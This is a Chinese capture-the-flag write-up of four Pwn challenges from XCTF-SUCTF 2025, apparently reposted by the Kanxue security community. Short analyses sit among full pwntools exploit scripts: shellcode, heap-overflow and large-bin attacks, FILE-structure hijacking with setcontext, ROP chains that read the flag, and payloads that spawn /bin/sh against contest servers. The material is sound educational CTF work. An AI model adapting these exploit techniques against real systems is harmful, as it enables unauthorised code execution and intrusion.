专栏名称: 看雪学苑
致力于移动与安全研究的开发者社区,看雪学院(kanxue.com)官方微信公众帐号。
目录
相关文章推荐
法治进行时  ·  大兴区消防救援支队助力2025年春运开展消防 ... ·  昨天  
法治进行时  ·  大兴区消防救援支队助力2025年春运开展消防 ... ·  昨天  
信安之路  ·  即使变卖个人资产,也要给大家把工资补上! ·  昨天  
TOP电商  ·  网红小狗命丧直播间,又一顶流网红遭全网审判 ·  2 天前  
TOP电商  ·  网红小狗命丧直播间,又一顶流网红遭全网审判 ·  2 天前  
财汇数据  ·  大咖云集,邀您参与企业预警通直播! ·  2 天前  
财汇数据  ·  大咖云集,邀您参与企业预警通直播! ·  2 天前  
企名片  ·  元禾璞华,宣布募资数十亿;影眸科技完成数千万 ... ·  3 天前  
企名片  ·  元禾璞华,宣布募资数十亿;影眸科技完成数千万 ... ·  3 天前  
51好读  ›  专栏  ›  看雪学苑

XCTF-SUCTF 2025-部分Pwn题解

看雪学苑  · 公众号  · 互联网安全  · 2025-01-22 17:59

正文

1





    


SU_baby


队友分析出来可以绕过 canary, 劫持返回地址到 attack。


exploit

# imLZH1
from pwn import *
#from ctypes import CDLL
#cdl = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
s    = lambda   x : io.send(x)
sa   = lambda x,y : io.sendafter(x,y)
sl   = lambda   x : io.sendline(x)
sla  = lambda x,y : io.sendlineafter(x,y)
r    = lambda x   : io.recv(x)
ru   = lambda x   : io.recvuntil(x)
rl   = lambda     : io.recvline()
itr  = lambda     : io.interactive()
uu32 = lambda x   : u32(x.ljust(4,b'\x00'))
uu64 = lambda x   : u64(x.ljust(8,b'\x00'))
ls   = lambda x   : log.success(x)
lss  = lambda x   : ls('\033[1;31;40m%s -> 0x%x \033[0m' % (x, eval(x)))

attack = '1.95.76.73:10000'
binary = './ASU1'

def start(argv=[], *a, **kw):
    if args.GDB:return gdb.debug(binary,gdbscript)
    if args.TAG:return remote(*args.TAG.split(':'))
    if args.REM:return remote(*attack.split(':'))
    return process([binary] + argv, *a, **kw)

context(binary = binary, log_level = 'debug',
terminal='tmux splitw -h -l 170'.split(' '))

libc = context.binary.libc
#elf  = ELF(binary)
#print(context.binary.libs)
#libc = ELF('./libc.so.6')

#import socks
#context.proxy = (socks.SOCKS5, '192.168.31.251', 10808)

gdbscript = '''
#continue
'''.format(**locals())

#io = rmote()
io = start([])


def cmd(a):
    sla(b': ',str(a))
def case1(id,name,con):
    cmd(1)
    sa(b'ID: ',id)
    sa(b': ',name)
    sa(b': ',con)
def detele(id):
    cmd(2)
    sla(b'ID: ',id)
def addfile(name,con):
    io.recv()
    sl(name)
    io.recv()
    s(con)

#'\x89\xc7\x56\x0f\x0f'

cmd(8)
sla(b':',str(10))
addfile(b'flag1',b'a')  
addfile(b'flag2',b'b')  
addfile(b'flag3','\x90\x90\x89\xc7\x54\x5e\x0f\x05')#   8
addfile(b'flag4',b'\x90')  
addfile(b'flag5',b'\x90'*4)  
addfile(b'flag6',b'\x90\x89\xc7\x54\x5e\x0f\x05'+b'\x56\x0f')
addfile(b'flag7',b'\x90\x90\x90\x89\xc7\x54\x5e\x0f\x05') # 9


xxx  = '''
mov edi,eax
push rsp
pop rsi
syscall
'''


gadget = 0x04028A6
#gdb.attach(io,f'b *{gadget}')
ru('opportunity')


sc1='''
nop
nop
nop
nop
nop
nop
'''

sc1 = asm(sc1)
s(sc1)

ru('want to do?')
sl(p64(gadget))

print(disasm(asm(xxx)))

pause()

sc  = asm(shellcraft.open('flag'))
sc += asm(shellcraft.read('rax','rsp',0x40))
sc += asm(shellcraft.write(1,'rsp',0x40))
sl(b'\x90'*0x80+sc)

#pay = flat({
#},filler=b'\x00')
#gdb.attach(io,gdbscript)

itr()


2

SU_text

分析

这里会heap++ 指针



如果紧接着调用的话,这里的 heap 指针也是++ 后的,基地址发生偏移,从而堆溢出。



后面 large_bin_attack 攻击mp_,

exploit

# imLZH1
from pwn import *
#from ctypes import CDLL
#cdl = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
s    = lambda   x : io.send(x)
sa   = lambda x,y : io.sendafter(x,y)
sl   = lambda   x : io.sendline(x)
sla  = lambda x,y : io.sendlineafter(x,y)
r    = lambda x   : io.recv(x)
ru   = lambda x   : io.recvuntil(x)
rl   = lambda     : io.recvline()
itr  = lambda     : io.interactive()
uu32 = lambda x   : u32(x.ljust(4,b'\x00'))
uu64 = lambda x   : u64(x.ljust(8,b'\x00'))
ls   = lambda x   : log.success(x)
lss  = lambda x   : ls('\033[1;31;40m%s -> 0x%x \033[0m' % (x, eval(x)))

attack = '1.95.76.73:10010'
binary = './SU_text'

def start(argv=[], *a, **kw):
    if args.GDB:return gdb.debug(binary,gdbscript)
    if args.TAG:return remote(*args.TAG.split(':'))
    if args.REM:return remote(*attack.split(':'))
    return process([binary] + argv, *a, **kw)

context(binary = binary, log_level = 'debug',
terminal='tmux splitw -h -l 170'.split(' '))

libc = context.binary.libc
#elf  = ELF(binary)
#print(context.binary.libs)
#libc = ELF('./libc.so.6')

#import socks
#context.proxy = (socks.SOCKS5, '192.168.31.251', 10808)

gdbscript = '''
#b *printf
#continue
'''.format(**locals())


def add(idx,size):
    pay  = b''
    pay += p8(1)
    pay += p8(0x10)
    pay += p8(idx)
    pay += p32(size)
    pay += p8(3)
    ru('bytes):\n')
    s(pay)

def rm(idx):
    pay  = b''
    pay += p8(1)
    pay += p8(0x11)
    pay += p8(idx)
    pay += p8(3)
    ru('bytes):\n')
    s(pay)

def write(idx,offset):
    pay  = b''
    pay += p8(2)
    pay += p8(idx)
    pay += p8(0x10)
    pay += p8(0x16)
    pay += p32(offset)
    pay += p8(0)
    pay += p8(3)
    return pay

def heap_to_buf(offset):
    pay  = b''
    pay += p8(2)
    pay += p8(0)
    pay += p8(0x10)
    pay += p8(0x15)
    pay += p32(offset)
    pay += p64(0) # buf
    pay += p8(0)
    pay += p8(3)
    return pay

def buf_to_heap(idx,offset,data):
    pay  = b''
    pay += p8(2)
    pay += p8(idx)
    pay += p8(0x10)
    pay += p8(0x14)
    pay += p32(offset)
    pay += p64(data) # buf
    pay += p8(0)
    pay += p8(3)
    return pay

def heap_add(idx,data1,data2):
    data1 = data1 & 0xFFFFFFFF
    data2 = data2 & 0xFFFFFFFF
    pay  = b''
    pay += p8(2)
    pay += p8(idx)
    pay += p8(0x10)
    pay += p8(0x10)
    pay += p32(data1)
    pay += p32(data2) # buf
    pay += p8(0)
    pay += p8(3)
    return pay

# game 2 vuln
def s2_xor(idx,data1,data2):
    data1 = data1 & 0xFFFFFFFF
    data2 = data2 & 0xFFFFFFFF
    pay  = b''
    pay += p8(2)
    pay += p8(idx)
    pay += p8(0x11)
    pay += p8(0x12)
    pay += p32(data1)
    pay += p32(data2) # buf
    pay += p8(0)
    pay += p8(3)
    return pay




#io = rmote()
io = start([])
#pay = flat({
#},filler=b'\x00')

add(0, 0x418)
add(1, 0x418)
rm(0)
add(0, 0x418)


pay  = heap_to_buf(0)[:-1]
pay += write(0,0xffffffe7+8)

#heap_to_buf(0)
#write(0,0)

ru('bytes):\n')
s(pay)
libc_base = uu64(r(8)) - 0x203b20
lss('libc_base')

#ru('bytes):\n')
#pay = buf_to_heap(0, 0, libc_base & 0xFFFFFFFF00000000)
#s(pay)

ru('bytes):\n')
pay = buf_to_heap(0, 0, 0)
s(pay)

ru('bytes):\n')
pay = buf_to_heap(0, 8, 0)
s(pay)


#ru('bytes):\n')
#pay = heap_add(0, 0, libc_base + 0x2031ec)
#s(pay)

add(2,0x428)
add(3,0x428) # pad
add(4,0x418)
add(5,0x428) # pad

rm(2)

add(6,0x438) # pad

rm(4)


#gdb.attach(io,gdbscript='brva 0x001752')
target = libc_base + 0x2031ec - 0x20

ru('bytes):\n')
pay  = s2_xor(1, 1, 2)[:-2]
pay += s2_xor(1, 1, 2)[2:-2] * 19
pay += buf_to_heap(0,0x3e8,target)[2:-2]
pay += heap_to_buf(0x3e0)[2:-2]
pay += write(0,0xffffffe7+8+3)[2:]

s(pay)
lss('libc_base')
heap_base = uu64(r(8))
lss('heap_base')

add(7,0x438)


add(8,0x450)
add(9,0x450)

rm(9)
rm(8)

libc.address = libc_base
heap_base += 0x2000
key = heap_base >> 0xC
ru('bytes):\n')
pay  = s2_xor(7, 1, 2)[:-2]
pay += s2_xor(7, 1, 2)[2:-2] * 19
pay += buf_to_heap(7,0x3f0, libc.sym['_IO_2_1_stdout_'] ^ key)[2:]
sl(pay)

lss('key')
lss('heap_base')
print(hex(libc.sym['_IO_2_1_stdout_']))

add(0x8,0x450)
add(0x9,0x450)


fake_IO_addr = libc.sym['_IO_2_1_stdout_']

#fake_io = flat({
#    0x00: '  sh;',
#    0x18: libc.sym['setcontext'] +61,
#    0x20: fake_IO_addr, # 0x20 > 0x18
#    0x68: 0,                # rdi  #read fd
#    0x70: fake_IO_addr,     # rsi  #read buf
#    0x88: fake_IO_addr + 0x8,     # rdx  #read size
#    0xa0: fake_IO_addr,
#    0xa8: libc.sym['read'], # RCE2 ogg
#    0xd8: libc.sym['_IO_wfile_jumps'] + 0x30 - 0x20,
#    0xe0: fake_IO_addr,
#    },filler=b'\x00')
fake_io = flat({
    0x00: '  sh;',
    0x18: libc.sym['setcontext'] + 61,
    0x20: fake_IO_addr, # 0x20 > 0x18
    0x68: fake_IO_addr,                # rdi  #read fd
    0x70: 0,     # rsi  #read buf
    0x78: fake_IO_addr,     # rsi2  #read buf
    0x88: fake_IO_addr + 0x8,     # rdx  #read size
    0x90: 0x400,     # rdx2  #read size
    0x98: 0x23,     # rdx  #read size
    0xa0: fake_IO_addr,
    0xa8: libc.sym['setcontext']+294, # RCE2 ogg
    0xb0: libc.sym['read'], # RCE2 ogg
    0xd8: libc.sym['_IO_wfile_jumps'] + 0x30 - 0x20,
    0xe0: fake_IO_addr,
    },filler=b'\x00')

ru('bytes):\n')
#pause()
pay  = buf_to_heap(9,0,0)[:-2]
for i in range(0,len(fake_io),8):
    p1 = u64(fake_io[i:i+8])
    pay += buf_to_heap(9,i,p1)[2:-2]

pay += buf_to_heap(9,i,p1)[-2:]
hexdump(pay)
#gdb.attach(io,gdbscript='b * _IO_switch_to_wget_mode')
s(pay)
pause()

libc_rop = ROP(libc)
rax = libc_rop.find_gadget(['pop rax','ret'])[0]
rdi = libc_rop.find_gadget(['pop rdi','ret'])[0]
rsi = libc_rop.find_gadget(['pop rsi','ret'])[0]
#rdx = libc_rop.find_gadget(['pop rdx','ret'])[0]
#rdx = libc_base + 0x0000000000066b9a
r13 = libc_base + 0x000584c9 # pop r13 ; ret
rdx = libc_base + 0x00000000000b00c7 #mov rdx, r13 ; pop rbx ; pop r12 ; pop r13 ; pop rbp ; ret
#rdx = libc_rop.find_gadget(['pop rdx','pop rbx','ret'])[0]
syscall = libc_rop.find_gadget(['syscall','ret'])[0]

orw_rop_addr = fake_IO_addr

orw_rop  = p64(rax) + p64(2) + p64(rdi) + p64(orw_rop_addr+0xd0+0x28) + p64(rsi) + p64(0) + p64(syscall)
orw_rop += p64(rdi) + p64(3) + p64(rsi) + p64(orw_rop_addr+0xd0+0x28) + p64(r13) + p64(0x100) + p64(rdx) + p64(0)*4+ p64(libc.sym['read'])
orw_rop += p64(rdi) + p64(1) + p64(rsi) + p64(orw_rop_addr+0xd0+0x28) + p64(r13) + p64(0x100) + p64(rdx) + p64(0)*4+ p64(libc.sym['write'])
orw_rop += b'/flag'.ljust(0x10,b'\x00')
sl(orw_rop)


#ru('bytes):\n')
#pay = write(0, 0x10+0x1728)
#s(pay)

itr()


3





    


SU_PAS_sport

分析

漏洞点在crete_data, 先赋值data_size,然后再判断的,然后就有了堆溢出的操作。


构造 data_ptr 可以先溢出到 text_ptr



后稍微爆破的方式把 fd 3,修改成0,



之后再使用功能4-2的时候就成标准输入了,后面就是堆溢出,覆盖指针,到bss,然后任意写。

任意写,覆盖原本的结构体。

exploit

# imLZH1
from pwn import *
#from ctypes import CDLL
#cdl = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
s    = lambda   x : io.send(x)
sa   = lambda x,y : io.sendafter(x,y)
sl   = lambda   x : io.sendline(x)
sla  = lambda x,y : io.sendlineafter(x,y)
r    = lambda x   : io.recv(x)
ru   = lambda x   : io.recvuntil(x)
rl   = lambda     : io.recvline()
itr  = lambda     : io.interactive()
uu32 = lambda x   : u32(x.ljust(4,b'\x00'))
uu64 = lambda x   : u64(x.ljust(8,b'\x00'))
ls   = lambda x   : log.success(x)
lss  = lambda x   : ls('\033[1;31;40m%s -> 0x%x \033[0m' % (x, eval(x)))

attack = '1.95.131.201:10012'
#attack = '127.0.0.1:1234'
binary = './chall'

def start(argv=[], *a, **kw):
    if args.GDB:return gdb.debug(binary,gdbscript)
    if args.TAG:return remote(*args.TAG.split(':'))
    if args.REM:return remote(*attack.split(':'))
    return process([binary] + argv, *a, **kw)

context(binary = binary, log_level = 'debug',
terminal='tmux splitw -h -l 170'.split(' '))

libc = context.binary.libc
#elf  = ELF(binary)
#print(context.binary.libs)
#libc = ELF('./libc.so.6')

#import socks
#context.proxy = (socks.SOCKS5, '192.168.31.251', 10808)

gdbscript = '''
b *0x00401299
#b *0x401F90
#b *0x401FC0
#b *0x401FF0
#b *0x402030
#b *0x402070
#b *0x4020B0
#b *0x4020F0
#b *0x402130
#continue
'''.format(**locals())

#io = rmote()
io = start([])

def menu(i):
    ru('choice >\n')
    sl(str(i))


# 1 byte
# 2 text
def add(Type):
    menu(1)
    ru('text\n')
    sl(str(Type))

def rm(Type):
    menu(2)
    ru('text\n')
    sl(str(Type))

def create_data(size):
    menu(3)
    ru(b'Please input the size of the data ocean.\n')
    sl(str(size))

def pull_data(size,Type):
    menu(4)
    ru(b'How much data?\n')
    sl(str(size))
    ru('2.gate of text\n')
    sl(str(Type))
    ru(b'bytes from the gate:\n')




#add(1)
#create_data(0)
#create_data(0x378)
#
#
#
#add(2)
#create_data(0x378)
#create_data(0)
#create_data(0x378)
#create_data(0)
#rm(2)
#create_data(0x378)
#add(2)


create_data(0x378)
create_data(0x1FFF)
add(1)
rm(1)
create_data(0x378)
add(2)
add(1)
create_data(0x2FFF)
# heap
### 为了调整 堆布局


#gdb.attach(io)
#itr()

# edit 0
while 1:
    pull_data(0x3a1, 1)
    data = ru('**GATES OF DATA**')
    x = int(data[:-19][-2:],16)
    if x == 0: # edit fd == 0
        break


#pull_data(0x3a1, 1)

menu(4)
ru(b'How much data?\n')
sl(str(0x3b0))
#sl(str(0x3b8+5))
ru('2.gate of text\n')
sl('2')

pause()

pay = '0\n' * 0x388
s(pay)

pay   = p64(0x3a0)
pay  += p64(0x480678)
pay  += p64(0x3a0)
pay  += p64(0xd7b100000000)
pay  += p64(0x1000) # edit size

x = '\n'.join([str(i) for i in  list(pay)])
sl(x)

pause()

#pay  = '0\n' * 0x3a0
#pay += '\n'.join([str(i) for i in p64(0xd7b100000000)])

menu(4)
ru(b'How much data?\n')
sl(str(0x1))
ru('2.gate of text\n')
sl('2')

pay  = b'1\n\x00'
pay  = pay.ljust(0x118+4,b'A')
pay += p64(0)
pay += p64(0)
pay += p64(0xd7b300000000)
pay += p64(0x1)
s(pay)


#pay += p64(0xd7b200000000)
#pay += p64(0x100)
#pay += p64(0)
#pay += p64(0)
#pay += p64(0)
#pay += p64(0x111111)
#pay += p64(0x41c710)
#pay += p64(0x41c6b0)
#pay += p64(0x41c6b0)
#pay += p64(0x41c660)
#s(pay)



# write /bin/sh
################################################################
menu(4)
ru(b'How much data?\n')
sl(str(0x3a0+0x58))
ru('2.gate of text\n')
sl('1')

pay = flat({
    0x398:0
},filler=b'\x00')

# read
pay += p64(0xd7b100000000)
pay += p64(0x1000)
pay += p64(0)
pay += p64(1)
pay += p64(0)
#pay += p64(0x47e9d0-2)
pay += p64(0x47f920-2) # ptr base
pay += p64(0x41c710)
pay += p64(0x41c680)
pay += p64(0)
pay += p64(0x41c660)
pay += p64(0)
sl(pay)


menu(4)
ru(b'How much data?\n')
sl(str(1))
ru('2.gate of text\n')
sl('2')
pay = b'/bin/sh\x00' # /bin/sh -c '/bin/sh'
sl(b'1\x00' + pay)






# set offset ,send pay
################################################################

menu(4)
ru(b'How much data?\n')
sl(str(0x3a0+0x58))
ru('2.gate of text\n')
sl('1')

pay = flat({
    0x398:0
},filler=b'\x00')

#gdb.attach(io,gdbscript)

pay += p64(0xd7b100000000)
pay += p64(0x1000)
pay += p64(0)
pay += p64(1)
pay += p64(1)
pay += p64(0x47e9a8) #  ooo
pay += p64(0x41c710)
pay += p64(0x41c680)
pay += p64(0x424242)
pay += p64(0x41c660)
pay += p64(0x434343)

sl(pay)


menu(4)
ru(b'How much data?\n')
sl(str(1))
ru('2.gate of text\n')
sl('2')
#
#gdb.attach(io,'b * 0x41ce1b')


pay = flat({
    #0x00:';sh;\xb2\xd7',
    0x00:'\x01\x00\x00\x00\xb2\xd7',
    0x10:0x0454F03,
    0x38:0x0456184,
    #0x3:0
},filler=b'\x00')
#gdb.attach(io)
sl(pay)

print('b *0x0456184')






#menu(4)
#ru(b'How much data?\n')
#sl(str(0x3a0+0x58))
#ru('2.gate of text\n')
#sl('1')
#
#pay = flat({
#    0x398:0
#},filler=b'\x00')
#
#
#pay += p64(0xd7b100000000)
#pay += p64(0x1000)
#pay += p64(0)
#pay += p64(1)
#pay += p64(0)
#pay += p64(0x47e9d0-2)
##pay += p64(0x47f920)
#pay += p64(0x41c710)
#pay += p64(0x41c680)
#pay += p64(0)
#pay += p64(0x41c660)
#pay += p64(0)
#sl(pay)
#





#for i range()k

#menu(4)
#ru(b'How much data?\n')
#sl(str(1))
#ru('2.gate of text\n')
#sl('2')


#pay = flat({
#    #0x00:';sh;\xb2\xd7',
#    0x00:0xd7b200000001,
#    0x08:0x100,
#    0x10:0x0,
#    0x18:0x0,
#    0x20:0x0,
#    0x28:0x414243,
#    #0x3:0
#},filler=b'\x00')
#s(pay#)

#rm(2)
#add(2)
#rm(2)
#add(2)
#rm(2)
#add(2)
#rm(2)
#add(2)
#pull_data(0x2a0, 1)
#pull_data(0x201,1)

#rm(1)
#pull_data(0x200, 2)







itr()

4

SU_JIT16


patch


把文件patch 一下 然后直接爆出来


# imLZH1
from pwn import *
#from ctypes import CDLL
#cdl = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
s    = lambda   x : io.send(x)
sa   = lambda x,y : io.sendafter(x,y)
sl   = lambda   x : io.sendline(x)
sla  = lambda x,y : io.sendlineafter(x,y)
r    = lambda x   : io.recv(x)
ru   = lambda x   : io.recvuntil(x)
rl   = lambda     : io.recvline()
itr  = lambda     : io.interactive()
uu32 = lambda x   : u32(x.ljust(4,b'\x00'))
uu64 = lambda x   : u64(x.ljust(8,b'\x00'))
ls   = lambda x   : log.success(x)
lss  = lambda x   : ls('\033[1;31;40m%s -> 0x%x \033[0m' % (x, eval(x)))

attack = ''
binary = './chall'

def start(argv=[], *a, **kw):
    if args.GDB:return gdb.debug(binary,gdbscript)
    if args.TAG:return remote(*args.TAG.split(':'))
    if args.REM:return remote(*attack.split(':'))
    return process([binary] + argv, *a, **kw)

#context(binary = binary, log_level = 'info',
context(binary = binary, log_level = 'debug',
terminal='tmux splitw -h -l 170'.split(' '))

libc = context.binary.libc
#elf  = ELF(binary)
#print(context.binary.libs)
#libc = ELF('./libc.so.6')

#import socks
#context.proxy = (socks.SOCKS5, '192.168.31.251', 10808)

gdbscript = '''
brva 0x02349
brva 0x0274D
#continue
'''.format(**locals())

#io = rmote()
#pay = flat({
#},filler=b'\x00')
#gdb.attach(io,gdbscript)

### 0
# hack gsp(0, 1, 0, 0, 0x1111)    0:   66 b8 11 11             mov    ax, 0x1111
# hack gsp(0, 1, 1, 0, 0x1111)    0:   66 bb 11 11             mov    bx, 0x1111
# hack gsp(0, 1, 2, 0, 0x1111)    0:   66 b9 11 11             mov    cx, 0x1111
# hack gsp(0, 1, 3, 0, 0x1111)    0:   66 ba 11 11             mov    dx, 0x1111

# hack gsp(0, 0, 0, 0, 0x1111)    0:   66 89 c0                mov    ax, ax
# hack gsp(0, 0, 0, 1, 0x1111)    0:   66 89 d8                mov    ax, bx
# hack gsp(0, 0, 0, 2, 0x1111)    0:   66 89 c8                mov    ax, cx
# hack gsp(0, 0, 0, 3, 0x1111)    0:   66 89 d0                mov    ax, dx
# hack gsp(0, 0, 1, 0, 0x1111)    0:   66 89 c3                mov    bx, ax
# hack gsp(0, 0, 1, 1, 0x1111)    0:   66 89 db                mov    bx, bx
# hack gsp(0, 0, 1, 2, 0x1111)    0:   66 89 cb                mov    bx, cx
# hack gsp(0, 0, 1, 3, 0x1111)    0:   66 89 d3                mov    bx, dx
# hack gsp(0, 0, 2, 0, 0x1111)    0:   66 89 c1                mov    cx, ax
# hack gsp(0, 0, 2, 1, 0x1111)    0:   66 89 d9                mov    cx, bx
# hack gsp(0, 0, 2, 2, 0x1111)    0:   66 89 c9                mov    cx, cx
# hack gsp(0, 0, 2, 3, 0x1111)    0:   66 89 d1                mov    cx, dx
# hack gsp(0, 0, 3, 0, 0x1111)    0:   66 89 c2                mov    dx, ax
# hack gsp(0, 0, 3, 1, 0x1111)    0:   66 89 da                mov    dx, bx
# hack gsp(0, 0, 3, 2, 0x1111)    0:   66 89 ca                mov    dx, cx
# hack gsp(0, 0, 3, 3, 0x1111)    0:   66 89 d2                mov    dx, dx


### 1
# hack gsp(1, 1, 0, 0, 0x1111)    0:   66 11 c0                adc    ax, ax
# hack gsp(1, 1, 0, 1, 0x1111)    0:   66 11 d8                adc    ax, bx
# hack gsp(1, 1, 0, 2, 0x1111)    0:   66 11 c8                adc    ax, cx
# hack gsp(1, 1, 0, 3, 0x1111)    0:   66 11 d0                adc    ax, dx
# hack gsp(1, 1, 1, 0, 0x1111)    0:   66 11 c3                adc    bx, ax
# hack gsp(1, 1, 1, 1, 0x1111)    0:   66 11 db                adc    bx, bx
# hack gsp(1, 1, 1, 2, 0x1111)    0:   66 11 cb                adc    bx, cx
# hack gsp(1, 1, 1, 3, 0x1111)    0:   66 11 d3                adc    bx, dx
# hack gsp(1, 1, 2, 0, 0x1111)    0:   66 11 c1                adc    cx, ax
# hack gsp(1, 1, 2, 1, 0x1111)    0:   66 11 d9                adc    cx, bx
# hack gsp(1, 1, 2, 2, 0x1111)    0:   66 11 c9                adc    cx, cx
# hack gsp(1, 1, 2, 3, 0x1111)    0:   66 11 d1                adc    cx, dx
# hack gsp(1, 1, 3, 0, 0x1111)    0:   66 11 c2                adc    dx, ax
# hack gsp(1, 1, 3, 1, 0x1111)    0:   66 11 da                adc    dx, bx
# hack gsp(1, 1, 3, 2, 0x1111)    0:   66 11 ca                adc    dx, cx
# hack gsp(1, 1, 3, 3, 0x1111)    0:   66 11 d2                adc    dx, dx

# hack gsp(1, 0, 0, 0, 0x1111)    0:   66 01 c0                add    ax, ax
# hack gsp(1, 0, 0, 1, 0x1111)    0:   66 01 d8                add    ax, bx
# hack gsp(1, 0, 0, 2, 0x1111)    0:   66 01 c8                add    ax, cx
# hack gsp(1, 0, 0, 3, 0x1111)    0:   66 01 d0                add    ax, dx
# hack gsp(1, 0, 1, 0, 0x1111)    0:   66 01 c3                add    bx, ax
# hack gsp(1, 0, 1, 1, 0x1111)    0:   66 01 db                add    bx, bx
# hack gsp(1, 0, 1, 2, 0x1111)    0:   66 01 cb                add    bx, cx
# hack gsp(1, 0, 1, 3, 0x1111)    0:   66 01 d3                add    bx, dx
# hack gsp(1, 0, 2, 0, 0x1111)    0:   66 01 c1                add    cx, ax
# hack gsp(1, 0, 2, 1, 0x1111)    0:   66 01 d9                add    cx, bx
# hack gsp(1, 0, 2, 2, 0x1111)    0:   66 01 c9                add    cx, cx
# hack gsp(1, 0, 2, 3, 0x1111)    0:   66 01 d1                add    cx, dx
# hack gsp(1, 0, 3, 0, 0x1111)    0:   66 01 c2                add    dx, ax
# hack gsp(1, 0, 3, 1, 0x1111)    0:   66 01 da                add    dx, bx
# hack gsp(1, 0, 3, 2, 0x1111)    0:   66 01 ca                add    dx, cx
# hack gsp(1, 0, 3, 3, 0x1111)    0:   66 01 d2                add    dx, dx

### 2
# hack gsp(2, 0, 0, 0, 0x1111)    0:   66 29 c0                sub    ax, ax
# hack gsp(2, 0, 0, 1, 0x1111)    0:   66 29 d8                sub    ax, bx
# hack gsp(2, 0, 0, 2, 0x1111)    0:   66 29 c8                sub    ax, cx
# hack gsp(2, 0, 0, 3, 0x1111)    0:   66 29 d0                sub    ax, dx
# hack gsp(2, 0, 1, 0, 0x1111)    0:   66 29 c3                sub    bx, ax
# hack gsp(2, 0, 1, 1, 0x1111)    0:   66 29 db                sub    bx, bx
# hack gsp(2, 0, 1, 2, 0x1111)    0:   66 29 cb                sub    bx, cx
# hack gsp(2, 0, 1, 3, 0x1111)    0:   66 29 d3                sub    bx, dx
# hack gsp(2, 0, 2, 0, 0x1111)    0:   66 29 c1                sub    cx, ax
# hack gsp(2, 0, 2, 1, 0x1111)    0:   66 29 d9                sub    cx, bx
# hack gsp(2, 0, 2, 2, 0x1111)    0:   66 29 c9                sub    cx, cx
# hack gsp(2, 0, 2, 3, 0x1111)    0:   66 29 d1                sub    cx, dx
# hack gsp(2, 0, 3, 0, 0x1111)    0:   66 29 c2                sub    dx, ax
# hack gsp(2, 0, 3, 1, 0x1111)    0:   66 29 da                sub    dx, bx
# hack gsp(2, 0, 3, 2, 0x1111)    0:   66 29 ca                sub    dx, cx
# hack gsp(2, 0, 3, 3, 0x1111)    0:   66 29 d2                sub    dx, dx

# hack gsp(2, 1, 0, 0, 0x1111)    0:   66 19 c0                sbb    ax, ax
# hack gsp(2, 1, 0, 1, 0x1111)    0:   66 19 d8                sbb    ax, bx
# hack gsp(2, 1, 0, 2, 0x1111)    0:   66 19 c8                sbb    ax, cx
# hack gsp(2, 1, 0, 3, 0x1111)    0:   66 19 d0                sbb    ax, dx
# hack gsp(2, 1, 1, 0, 0x1111)    0:   66 19 c3                sbb    bx, ax
# hack gsp(2, 1, 1, 1, 0x1111)    0:   66 19 db                sbb    bx, bx
# hack gsp(2, 1, 1, 2, 0x1111)    0:   66 19 cb                sbb    bx, cx
# hack gsp(2, 1, 1, 3, 0x1111)    0:   66 19 d3                sbb    bx, dx
# hack gsp(2, 1, 2, 0, 0x1111)    0:   66 19 c1                sbb    cx, ax
# hack gsp(2, 1, 2, 1, 0x1111)    0:   66 19 d9                sbb    cx, bx
# hack gsp(2, 1, 2, 2, 0x1111)    0:   66 19 c9                sbb    cx, cx
# hack gsp(2, 1, 2, 3, 0x1111)    0:   66 19 d1                sbb    cx, dx
# hack gsp(2, 1, 3, 0, 0x1111)    0:   66 19 c2                sbb    dx, ax
# hack gsp(2, 1, 3, 1, 0x1111)    0:   66 19 da                sbb    dx, bx
# hack gsp(2, 1, 3, 2, 0x1111)    0:   66 19 ca                sbb    dx, cx
# hack gsp(2, 1, 3, 3, 0x1111)    0:   66 19 d2                sbb    dx, dx


### 4
# hack gsp(4, 1, 0, 0, 0x1111)    0:   66 f7 d8                neg    ax
# hack gsp(4, 1, 0, 1, 0x1111)    0:   66 f7 db                neg    bx
# hack gsp(4, 1, 0, 2, 0x1111)    0:   66 f7 d9                neg    cx
# hack gsp(4, 1, 0, 3, 0x1111)    0:   66 f7 da                neg    dx
# hack gsp(4, 1, 1, 0, 0x1111)    0:   66 f7 d8                neg    ax
# hack gsp(4, 1, 1, 1, 0x1111)    0:   66 f7 db                neg    bx
# hack gsp(4, 1, 1, 2, 0x1111)    0:   66 f7 d9                neg    cx
# hack gsp(4, 1, 1, 3, 0x1111)    0:   66 f7 da                neg    dx
# hack gsp(4, 1, 2, 0, 0x1111)    0:   66 f7 d8                neg    ax
# hack gsp(4, 1, 2, 1, 0x1111)    0:   66 f7 db                neg    bx
# hack gsp(4, 1, 2, 2, 0x1111)    0:   66 f7 d9                neg    cx
# hack gsp(4, 1, 2, 3, 0x1111)    0:   66 f7 da                neg    dx
# hack gsp(4, 1, 3, 0, 0x1111)    0:   66 f7 d8                neg    ax
# hack gsp(4, 1, 3, 1, 0x1111)    0:   66 f7 db                neg    bx
# hack gsp(4, 1, 3, 2, 0x1111)    0:   66 f7 d9                neg    cx
# hack gsp(4, 1, 3, 3, 0x1111)    0:   66 f7 da                neg    dx

# hack gsp(4, 2, 0, 0, 0x1111)    0:   66 c1 e8 0f             shr    ax, 0xf
# hack gsp(4, 2, 0, 1, 0x1111)    0:   66 c1 eb 0f             shr    bx, 0xf
# hack gsp(4, 2, 0, 2, 0x1111)    0:   66 c1 e9 0f             shr    cx, 0xf
# hack gsp(4, 2, 0, 3, 0x1111)    0:   66 c1 ea 0f             shr    dx, 0xf
# hack gsp(4, 2, 1, 0, 0x1111)    0:   66 c1 e8 0f             shr    ax, 0xf
# hack gsp(4, 2, 1, 1, 0x1111)    0:   66 c1 eb 0f             shr    bx, 0xf
# hack gsp(4, 2, 1, 2, 0x1111)    0:   66 c1 e9 0f             shr    cx, 0xf
# hack gsp(4, 2, 1, 3, 0x1111)    0:   66 c1 ea 0f             shr    dx, 0xf
# hack gsp(4, 2, 2, 0, 0x1111)    0:   66 c1 e8 0f             shr    ax, 0xf
# hack gsp(4, 2, 2, 1, 0x1111)    0:   66 c1 eb 0f             shr    bx, 0xf
# hack gsp(4, 2, 2, 2, 0x1111)    0:   66 c1 e9 0f             shr    cx, 0xf
# hack gsp(4, 2, 2, 3, 0x1111)    0:   66 c1 ea 0f             shr    dx, 0xf
# hack gsp(4, 2, 3, 0, 0x1111)    0:   66 c1 e8 0f             shr    ax, 0xf
# hack gsp(4, 2, 3, 1, 0x1111)    0:   66 c1 eb 0f             shr    bx, 0xf
# hack gsp(4, 2, 3, 2, 0x1111)    0:   66 c1 e9 0f             shr    cx, 0xf
